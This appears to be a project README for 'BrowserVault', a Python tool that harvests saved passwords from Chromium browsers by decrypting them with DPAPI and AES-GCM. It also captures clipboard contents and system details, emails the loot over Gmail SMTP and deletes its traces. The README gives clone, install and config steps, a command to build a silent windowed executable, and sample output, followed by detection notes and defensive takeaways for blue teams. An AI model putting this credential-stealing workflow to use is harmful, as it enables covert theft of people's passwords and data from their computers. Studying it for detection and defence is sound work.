A post-exploitation simulation tool that demonstrates how browser-stored credentials, clipboard contents, and system fingerprints can be harvested and exfiltrated from a compromised Windows endpoint. Built for red team labs, malware research, and security awareness training.
⚠️ Authorized use only. Only run against systems you own or have explicit written permission to audit. Unauthorized use is illegal.
Simulates the credential harvesting phase of a post-exploitation attack — the kind that follows an initial foothold via phishing or local access. Extracts data silently, stages it in a hidden directory, exfiltrates via SMTP, then self-cleans.
[*] Starting credential audit...
[+] Chrome ✓ 12 credentials extracted
[+] Edge ✓ 8 credentials extracted
[+] Brave ✓ 3 credentials extracted
[+] Opera / GX ✓ 1 credential extracted
[+] Clipboard ✓ Contents captured
[+] System info ✓ OS, hostname, network fingerprint collected
[*] Staging to hidden directory...
[*] Exfiltrating via SMTP...
[*] Cleaning up local traces...
[+] Done.
| Component | Implementation |
|---|---|
| Credential extraction | DPAPI decryption via win32crypt + AES-GCM (pycryptodome) |
| Target browsers | Chrome, Edge, Brave, Opera, Opera GX |
| System fingerprint | Hostname, OS version, local IP via socket + platform |
| Clipboard capture | pyperclip |
| Staging | Hidden folder (SysDataHidden) in user profile |
| Exfiltration | Gmail SMTP with App Password auth |
| Cleanup | os.remove() post-send |
Chromium-based browsers encrypt saved passwords using Windows DPAPI with an AES-GCM layer added since Chrome 80. The process:
- Read the encrypted key from
Local State(base64-encoded) - Strip the
DPAPIprefix and decrypt usingCryptUnprotectData - Use the decrypted key to AES-GCM decrypt each password from the
Login DataSQLite DB
This is the same mechanism legitimate password managers and browser sync services use — which is exactly why local access to a user session is so dangerous.
git clone https://github.com/Dawn-Fighter/BrowserVault.git
cd BrowserVault
pip install pyperclip pycryptodome pypiwin32Edit the top of info.py:
SENDER_EMAIL = "sender@gmail.com"
APP_PASSWORD = "xxxx xxxx xxxx xxxx" # Gmail App Password, not your login password
RECIPIENT_EMAIL = "receiver@gmail.com"# Run audit
python info.py
# Build as silent executable for lab deployment testing
pip install pyinstaller
pyinstaller --onefile --windowed info.py
# Output in /distA loot.dat file is generated containing extracted credentials, system info, and clipboard contents. It is emailed to RECIPIENT_EMAIL then deleted from disk. To inspect manually before sending, comment out the cleanup line in info.py.
This tool gets caught by:
- EDR behavioral analysis — DPAPI calls from non-browser processes are flagged
- SQLite access monitoring — reading
Login Datawhile Chrome is running triggers file lock warnings - SMTP from non-mail clients — network-level DLP picks this up
- AV heuristics —
CryptUnprotectData+ outbound SMTP in the same process is a strong signal
Defensive takeaways for blue teams:
- Browser-stored credentials are trivially extractable on any compromised endpoint
- Unlocked user sessions are high-value targets — enforce screen lock and session timeouts
- DPAPI protection is only as strong as local account security
- Deploy EDR rules alerting on
Login DataSQLite access by non-browser processes
Built for post-exploitation research, red team simulations, and security awareness training. Only deploy in isolated lab environments on systems you own or have written authorization to test. Delete all output files after use. The author assumes no responsibility for misuse.
Chethas Dileep — Penetration Tester & Security Developer
